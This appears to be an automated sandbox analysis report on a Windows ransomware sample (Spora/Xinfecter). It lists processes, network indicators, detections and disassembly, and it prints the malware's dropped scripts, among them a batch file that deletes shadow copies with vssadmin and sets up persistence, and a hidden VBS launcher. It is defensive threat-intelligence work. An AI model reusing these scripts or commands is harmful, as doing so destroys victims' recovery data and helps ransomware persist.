Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph ID: 1569976
Sample: 8AbMCL2dxM.exe
Startdate: 06/12/2024
Architecture: WINDOWS
Score: 100

Signatures attached to the sample: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 15 other signatures
DNS attached to the sample: api.ipify.org
Processes started at the root: 8AbMCL2dxM.exe, cmd.exe, Xinfecter.exe

8AbMCL2dxM.exe
• Network: 185.147.34.53, 3586, 49742 HOSTSLIM-GLOBAL-NETWORKNL Iceland; api.ipify.org 104.26.12.205, 49736, 80 CLOUDFLARENETUS United States
• Dropped: C:\Users\user\AppData\...\Xinfecter.exe, PE32; C:\Windows\SysMain.sys, ASCII; C:\Users\user\AppData\S-8459.vbs, ASCII; 4 other malicious files
• Signatures: Deletes shadow drive data (may be related to ransomware); Drops PE files to the startup folder; Sample is not signed and drops a device driver; Contains functionality to clear event logs
• Started: three cmd.exe instances and 9 other processes
  • First cmd.exe: signatures Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Writes or reads registry keys via WMI. Started tasklist.exe and findstr.exe
  • Second cmd.exe: started wscript.exe (signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)), which started two cmd.exe; the first of these started tasklist.exe, conhost.exe, find.exe and 18 other processes, the second started conhost.exe
  • Third cmd.exe: started systeminfo.exe (signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI; started WmiPrvSE.exe) and find.exe
  • 9 other processes: started schtasks.exe and 5 other processes

cmd.exe (root)
• Started: wscript.exe and conhost.exe
  • wscript.exe: signature Windows Scripting host queries suspicious COM object (likely to drop second stage). Started two cmd.exe; the first started tasklist.exe (signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI), conhost.exe and find.exe, the second started conhost.exe

Xinfecter.exe (root)
• Started: conhost.exe

Source | Detection | Scanner | Label
8AbMCL2dxM.exe | 76% | ReversingLabs | Win32.Ransomware.Spora
8AbMCL2dxM.exe | 100% | Avira | HEUR/AGEN.1353205
8AbMCL2dxM.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 100% | Avira | HEUR/AGEN.1353205
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | 76% | ReversingLabs | Win32.Ransomware.Spora
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org | 104.26.12.205 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://api.ipify.org/ | 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, 8AbMCL2dxM.exe, 00000001.00000002.3512126954.0000000000AE9000.00000004.00000010.00020000.00000000.sdmp | false | | high
http://api.ipify.org/ows | 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D66000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://api.ipify.orgd | 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.kraken.com/learn/buy-bitcoin-btc | 8AbMCL2dxM.exe, Xinfecter.exe.1.dr | false | | high
https://www.coinbase.com/how-to-buy/bitcoin | 8AbMCL2dxM.exe, Xinfecter.exe.1.dr | false | | high
http://api.ipify.org | 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp | false | | high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
185.147.34.53 | unknown | Iceland | 207083 | HOSTSLIM-GLOBAL-NETWORKNL | true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1569976
                        Start date and time:2024-12-06 13:38:13 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 10s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:63
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:8AbMCL2dxM.exe
                        renamed because original name is a hash value
                        Original Sample Name:2bf6feb23ce675cad218c51153a8577d35da7e6b33466d1aa8e63ba69c66295d.exe
                        Detection:MAL
                        Classification:mal100.rans.troj.adwa.evad.winEXE@119/22@1/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 46
                        • Number of non-executed functions: 213
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.85.23.206
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: 8AbMCL2dxM.exe
Time | Type | Description
13:39:19 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
13:39:21 | Task Scheduler | Run new task: Microsoft_Auto_Scheduler path: "C:\Users\user\AppData\S-2153.bat"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | Simple2.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | Ransomware Mallox.exe | malicious | Targeted Ransomware | api.ipify.org/
104.26.12.205 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | 6706e721f2c06.exe | malicious | Remcos | api.ipify.org/
104.26.12.205 | perfcc.elf | malicious | Xmrig | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | hloRQZmlfg.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
185.147.34.53 | Help.File@zohomail.eu_Fast.exe | malicious | TrojanRansom |
185.147.34.53 | Xinfecter.exe | malicious | TrojanRansom |
185.147.34.53 | Ross.dec1966@gmail.com_Fast.bin.exe | malicious | Babuk, Chaos, Conti, RegretLocker, TrojanRansom |
185.147.34.53 | 12.exe1 | malicious | BTC, Conti, Neshta, RegretLocker, TrojanRansom |
185.147.34.53 | DttL6H1DqQ.exe | malicious | Babuk, Chaos, Conti |
185.147.34.53 | PAvH6odjUO.exe | malicious | Voidcrypt |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.ipify.org | Simple1.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | Simple1.exe | malicious | Unknown | 104.26.13.205
api.ipify.org | Simple2.exe | malicious | Unknown | 104.26.12.205
api.ipify.org | Simple2.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | systemConfigChecker.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | systemConfigChecker.exe | malicious | Unknown | 172.67.74.152
api.ipify.org | kYGxoN4JVW.bat | malicious | Unknown | 172.67.74.152
api.ipify.org | REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | PO54782322024.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2dd | malicious | EvilProxy, HTMLPhisher | 104.26.13.205
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.au | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 5Xt3byH0Pj.exe | malicious | XenoRAT | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 1733477410159edf9b85a179e6cba033f8cb2d5a86e8ca4544f9e9f23b783f46e15a7ae1a2802.dat-decoded.exe | malicious | AsyncRAT, DcRat | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 2E7y4M3fki.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Rubik_v3.3.1.xlsm | malicious | HTMLPhisher | 13.107.246.63
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    HOSTSLIM-GLOBAL-NETWORKNLla.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                    • 213.166.86.57
                                    cenSXPimaG.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 213.166.86.22
                                    SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    REMITTANCE SLIP.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    PAYMENT SWIFT.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    PAYMENT RECEIPT.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    hsbc Wire copy.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    bin.exeGet hashmaliciousFormBookBrowse
                                    • 103.214.4.45
                                    CxmpudkF8Y.exeGet hashmaliciousRedLineBrowse
                                    • 185.147.34.93
                                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.16.9
                                    https://rnicrosoft-secured-office.squarespace.com/sharepoint?e=test@test.com.auGet hashmaliciousHTMLPhisherBrowse
                                    • 104.21.25.148
                                    https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.pngGet hashmaliciousHTMLPhisherBrowse
                                    • 104.21.85.204
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                    • 104.18.69.40
                                    Simple1.exeGet hashmaliciousUnknownBrowse
                                    • 172.67.74.152
                                    Pr9cqW75nY.lnkGet hashmaliciousUnknownBrowse
                                    • 104.18.10.207
                                    G3vWD786PN.lnkGet hashmaliciousUnknownBrowse
                                    • 104.18.11.207
                                    hTXtTJXdLt.lnkGet hashmaliciousUnknownBrowse
                                    • 104.18.11.207
                                    fqufh5EOJr.lnkGet hashmaliciousUnknownBrowse
                                    • 104.18.11.207
                                    No context
                                    No context
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:modified
                                    Size (bytes):12
                                    Entropy (8bit):2.6258145836939115
                                    Encrypted:false
                                    SSDEEP:3:fuM9:2I
                                    MD5:E4A5E3AE7A904A86A50AE5FC1A38F374
                                    SHA1:0B536BF59DE491CCC2CAA8AE52200CD6B61364E9
                                    SHA-256:4EF53CF7C95DBE1BE9AC5E3D7465B91B911FD5C198EB161A55AF5579D9390C1A
                                    SHA-512:17D3508E7E847B91E84A06BA32BAD9A6CEC55373EE877E1163AB74EF4E18A72C38DD43897BE21E26556CBDE58DF9446E06B59B2BB37CC0321B5228D57C80A146
                                    Malicious:false
                                    Preview:8.46.123.228
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with very long lines (3460), with no line terminators
                                    Category:dropped
                                    Size (bytes):3460
                                    Entropy (8bit):6.011339466446963
                                    Encrypted:false
                                    SSDEEP:96:Sgw1uaPQAgu6e0fbQtSiF9vy6bmCRjWwLjRsx:Sgw0AB6eKi7bmcBjux
                                    MD5:CBBA7EFF5DED1DC813997EB60015A830
                                    SHA1:2F3318FF0521E300526F080757094752C343AD0C
                                    SHA-256:D5A7580E5392ED704446519DE794D97238868AFEF491BD9BCD590F8DE0299394
                                    SHA-512:A461EF955732552E2A28B9B3517E981AE1462353AB38D6AD33394B20F6C88845625890D244281820E98091218D92A9483DF95744682B99B30985C56481865235
                                    Malicious:true
                                    Preview:$0i73LmNE8fubdmAhIBOKOe+dPubQaK6HX4VBI92/QIfSLuu4OvksM5GE/+kd+12Z319zHvOJ34w+Jc7tzsy2OszP8AoKc0yFbCl2LpYOly8jK4wq+9QpGQHb/p7s1tL5oOGqsZSI8EFO1NaUJwhDJfsFPnKgiQx1KTsfO3dnmyfZAoK6fQJeaxlk78LwXZRHSz9yH9vwq6t3YleZoXXXqGG+7kW9+5QhwUipUzysvYKD3GrDuuCZ72G8CrIbQ58XAylXEhIT1BxZceNitdbL3+DN/k27WGIyEf78tdmb5LlhhtrMNjEtPE6tL0vd4SfEck8DuiRgxV32/ZKl/5ekLyg==$1krWG/UZb92gbueruec3KBW0RIEfEoZ27e9/3W0TZ2Ij8Db9pS9f0/ifREAOmfDuefXqVQNY31vcM+dHXQoU9ylw6jIC77P/WAi+Nk7pkRT0ydvAq2DsdWg8MmtnvJFfEOEf2J3A6n2FsP15T6h78Y5nkWnelBFRD82ij9oZpHxZwo0AIiwf5NhRSWgpiuL0y+6KBzWMHNtMSw3mVzaUrNc1FAGiodS2qRzXLgDYtD5J9Iz2iMz5Z/dm4TESlGPr1Kjcmph190cIffFnfGGnrCh6TXisImuN+TvVgPrUU+eJAmL2Z/gwVZ03WJjRARckN5sJ/VIWgGGRife6BOaZn2Q==$2iq4R75uJw+IsoSSNTI1Por9gxu0U3YqkfOnqVB1EuXKwjFCU8bxNAk+knd8DXW7Al1hJ8sViJdtGr5k7dXk1lVPpC94OOzQASBbkOQn55VLVBsRAy2UVaJAhJc+NSHkz8NLAb8BJ5845hHxkE6x2+2V2XcXAW6nkyhQl2DOGwjC8hsMsAcMWsId5UvXF+b/EtSpKzyusowPvNW16dGKR0xOK18bePnKloaiL5WFNfa3lpBn/HvK8v3NAbIquUdysaSvK7jVzgIftTZlJjrgcNy5OY427VauB5KkTabC1FTT1nTJqEQ
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1260544
                                    Entropy (8bit):6.589860058604123
                                    Encrypted:false
                                    SSDEEP:24576:ndoamK7fChNrFR8o5Ed41ENk/zxNPBcKamSy+Oy3qLP9fpxDBhQXkZGc:6a7yNrFR+u1dxNPBcZy6qJfpdBhQXaGc
                                    MD5:F383DB0B947E0BCE25A542DD7FC11139
                                    SHA1:2AE37FDA200D51610FBE6CAD6DDE08BBBB802A0A
                                    SHA-256:2BF6FEB23CE675CAD218C51153A8577D35DA7E6B33466D1AA8E63BA69C66295D
                                    SHA-512:3AFD8627B3A50EDD13B5248E01B7F1EEC4A2694BDB91B290B1CFD6D22B496E7AE9A5DA49CE2F8CC3E8F514515C7E356D595525B4E6412932C4893C68E7059EE9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 76%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7................PE..L....o.f............................1........0....@.......................................@..........................................................................V..8....................W.......V..@............0..(............................text............................... ..`.rdata.......0......."..............@..@.data...x...........................@....rsrc................b..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):138
                                    Entropy (8bit):4.970414275542141
                                    Encrypted:false
                                    SSDEEP:3:mKDD/j2hFHTnmTPcYWA6/hEREVdPTHAF6vWEzn9TmTPcYWA6/hEREVdPTHAoU:hGh9TnmTPYA6/Si3rHV7TQTPYA6/Si36
                                    MD5:82A528CBF39B8EA7E2982E7B2305204C
                                    SHA1:717836E0E2B304ED7AE239CC1DB0F6F80E0419B1
                                    SHA-256:616738526C38E04F992B7B9FC60CB7FEB3EE416BF47B69AA2C3A5F1A722A653B
                                    SHA-512:EFF7654E171DBD9BC471718A7E14EE3C84A9EDF948F4C8863C8107E653BE8BA06BC7A2876D506D6E4AE7EF2280E820D04615EBCD88894EF01B3667D070241DB3
                                    Malicious:true
                                    Preview:@echo off..IF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (..start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"..)
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1855
                                    Entropy (8bit):5.3649075450209125
                                    Encrypted:false
                                    SSDEEP:48:NKs+0hnuYWnui9Nzq5uhnuYWnuiGhnuYZeXknc4hg0hLdY:75kYliHqIkYliGkYZeXWBJnY
                                    MD5:011CF1246EBDF1AB2DCD67ACA77E90D3
                                    SHA1:D390F23D29A3D833B1CC78DC305A33AB88240B7D
                                    SHA-256:192F8E53FD09816976F95AC8139C7697E4D66D9FBBA2B07FA9EE1EAB8FA96EE1
                                    SHA-512:BEF8BBC307EF0950713B34F7B876E171EC458359EB79801F5FD73E13244524FE82E5FA3C710962627C3E0E8FF83178DC3A4D1E03DA1DF58D9E88D798469C2ECB
                                    Malicious:true
                                    Preview:@echo off..tasklist /v | find /I /c "dcdcf" > nul..if "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunning..set lend=deb..vssadmin.exe Delete Shadows /All /Quiet..title dcdcf..goto notend..:ErrorAlreadyRunning..exit..:secthree..tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv 2>NUL | find /I "8AbMCL2dxM.exe">NUL..if "%ERRORLEVEL%"=="0" goto imer..if %lend% == bed (goto akakak)..set lend=bed..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" (..start /d "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" Xinfecter.exe ..)..:secttwo..tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv 2>NUL | find /I "8AbMCL2dxM.exe">NUL..if "%ERRORLEVEL%"=="0" goto notend..goto secton..:notend..timeout /t 15 /nobreak >NUL..IF NOT EXIST "C:\Users\ReadMe.hta" (..goto secttwo..:secton..IF EXIST "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):686
                                    Entropy (8bit):5.1743757294368
                                    Encrypted:false
                                    SSDEEP:12:MDhOfTK2Opx6/SYSHFagnXoWHgvvT9vTnMS8h92Mbx6/SYTlZ7D:s6f9/SY7UgDVnMS8j2Mbs/SYTlZH
                                    MD5:ED7A274FF8AC640416952BFB5D6C927A
                                    SHA1:6B33CD5B39DB6E9A900336E446F64A137F0A0F42
                                    SHA-256:4D68E4A7A437EB4A7AD9C7B28BDDA894A68AE41EFBA8A5E4D3A6A930BEBFEEA5
                                    SHA-512:8F3A4F071550AFE716C5D39601CF1E8559084FBB701E95B28EB7685FED6D8A972E662AD19124A2242FD30C291B8DD1F18F1A2DCF56AC6C98F2BF96BAC91510F3
                                    Malicious:true
                                    Preview:Dim strScript..Dim oExec, oWshShell..Dim ComSpec..Set oWshShell = CreateObject("WScript.Shell")..ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")..strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"..Set oExec = oWshShell.Exec (strScript)..Dim outputsxc..outputsxc = oExec.StdOut.ReadAll()..Set fso = CreateObject("Scripting.FileSystemObject")..outputsxc = Replace(outputsxc, vbCr, "")..outputsxc = Replace(outputsxc, vbLf, "")..If (fso.FileExists(outputsxc)) Then..Set WinScriptHost = CreateObject("WScript.Shell")..WinScriptHost.Run Chr(34) & "%SystemDrive%\Users\%username%\AppData\S-6748.bat" & Chr(34), 0..Set WinScriptHost = Nothing..End If
                                    Process:C:\Users\user\Desktop\8AbMCL2dxM.exe
                                    File Type:ASCII text, with very long lines (417), with no line terminators
                                    Category:dropped
                                    Size (bytes):417
                                    Entropy (8bit):5.873176961754405
                                    Encrypted:false
                                    SSDEEP:12:BwSxYnPklvckiHNNir4O1l63VPoXy7jQRe8Xn:B7enPVfNNeT63VPuy7jQ7X
                                    MD5:8E5FDA3A7FFC1FC9884BB6AE5895DECE
                                    SHA1:0C2FF5E88F9D11F6D70CD355048C044A238348FC
                                    SHA-256:B2561E16A51792242FD070E3DA48D8980A60B8A74B9652F15B495B3432B641DC
                                    SHA-512:2D7775C893AC69BD863D31C3B998C9A0EBE5D55BAF3808C9EF05E4A217C0CCEF9A84372208421CEA6CC150D052C2520E3D874F4484632B672751FBB11105C0D6
                                    Malicious:true
                                    Preview:n7t0MIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAw61oFhdbzq68hx+r1OCsWC5eGJNlJbD+jarY9KfmFomcAXdY2Ly2+y54DOn8cC5YlQRC/v5V0S2HI60JlTIrTDcbwm+lPvEiImGnplemE4bLQbzqyoI/frw+VJ+r1cjT81E3bSmS388gSb6J8Nl3hajCKRIzhOZULLDxsnuKFxnnlj9h1ew0OrT3waCymg7Tdr/kaF6QMOCNzAgFtL/chNy6ehLq17pnnO3Kd0D1Lk/nccKS8ZClO8xlOoVaP5oW0U02sYUUjQMhc5G0jpMUA2hY0/x7Pi2uQTGl2e9eCnTlqMZDLZju0tN3yi7CSgrDFS1nBpRhhrJm/b4016A/qQIBEQ==p2h677H75u4g8.1UIh2gq
                                    Process:C:\Windows\SysWOW64\find.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):50
                                    Entropy (8bit):4.334177320667442
                                    Encrypted:false
                                    SSDEEP:3:QomiHHSJXpdiupJEIv:Qom77pqS
                                    MD5:756806A34DDDC8D0B45E5470B59EA766
                                    SHA1:728F13AD9CFC18FB10C947E62D7DD9CA46BDC024
                                    SHA-256:119D5F188D2E4E1A4E0E2B33876C94D110028805D79578E0B7BF28A13524CC08
                                    SHA-512:7811C50BD4847A321A697D9D003C902F8114196886228045A1A784B59A8F7DA13AA1B33FC068550B6015B9E80A5D9626B8F6E778DEC4453BF6F7A53DED9F8CA8
                                    Malicious:false
                                    Preview:"8AbMCL2dxM.exe","7152","Console","1","15'492 K"..
                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                    Entropy (8bit):6.589860058604123
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:8AbMCL2dxM.exe
                                    File size:1'260'544 bytes
                                    MD5:f383db0b947e0bce25a542dd7fc11139
                                    SHA1:2ae37fda200d51610fbe6cad6dde08bbbb802a0a
                                    SHA256:2bf6feb23ce675cad218c51153a8577d35da7e6b33466d1aa8e63ba69c66295d
                                    SHA512:3afd8627b3a50edd13b5248e01b7f1eec4a2694bdb91b290b1cfd6d22b496e7ae9a5da49ce2f8cc3e8f514515c7e356d595525b4e6412932c4893c68e7059ee9
                                    SSDEEP:24576:ndoamK7fChNrFR8o5Ed41ENk/zxNPBcKamSy+Oy3qLP9fpxDBhQXkZGc:6a7yNrFR+u1dxNPBcZy6qJfpdBhQXaGc
                                    TLSH:9C45BD207642C132D56181B05E7CFB9AD0ADBC384F758ACBB3C46B2E5A315D25E36E63
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jid.+.7.+.7.+.7,..7.+.7,..7++.7,..7.+.7,A.6.+.7,A.6.+.7,A.6.+.7.S.7.+.7.+.7A+.7.@.6.+.7.@.6.+.7.@.7.+.7.@.6.+.7Rich.+.7.......
                                    Icon Hash:00928e8e8686b000
                                    Entrypoint:0x491731
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows cui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66006F02 [Sun Mar 24 18:20:50 2024 UTC]
                                    TLS Callbacks:0x490d70
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:f527e8080fac9432953c548a4f7317af
                                    Instruction
                                    call 00007F18B9266A37h
                                    jmp 00007F18B9265BA9h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    cmp cl, 00000040h
                                    jnc 00007F18B9265D47h
                                    cmp cl, 00000020h
                                    jnc 00007F18B9265D38h
                                    shrd eax, edx, cl
                                    shr edx, cl
                                    ret
                                    mov eax, edx
                                    xor edx, edx
                                    and cl, 0000001Fh
                                    shr eax, cl
                                    ret
                                    xor eax, eax
                                    xor edx, edx
                                    ret
                                    int3
                                    push esi
                                    mov eax, dword ptr [esp+14h]
                                    or eax, eax
                                    jne 00007F18B9265D5Ah
                                    mov ecx, dword ptr [esp+10h]
                                    mov eax, dword ptr [esp+0Ch]
                                    xor edx, edx
                                    div ecx
                                    mov ebx, eax
                                    mov eax, dword ptr [esp+08h]
                                    div ecx
                                    mov esi, eax
                                    mov eax, ebx
                                    mul dword ptr [esp+10h]
                                    mov ecx, eax
                                    mov eax, esi
                                    mul dword ptr [esp+10h]
                                    add edx, ecx
                                    jmp 00007F18B9265D79h
                                    mov ecx, eax
                                    mov ebx, dword ptr [esp+10h]
                                    mov edx, dword ptr [esp+0Ch]
                                    mov eax, dword ptr [esp+08h]
                                    shr ecx, 1
                                    rcr ebx, 1
                                    shr edx, 1
                                    rcr eax, 1
                                    or ecx, ecx
                                    jne 00007F18B9265D26h
                                    div ebx
                                    mov esi, eax
                                    mul dword ptr [esp+14h]
                                    mov ecx, eax
                                    mov eax, dword ptr [esp+10h]
                                    mul esi
                                    add edx, ecx
                                    jc 00007F18B9265D40h
                                    cmp edx, dword ptr [esp+0Ch]
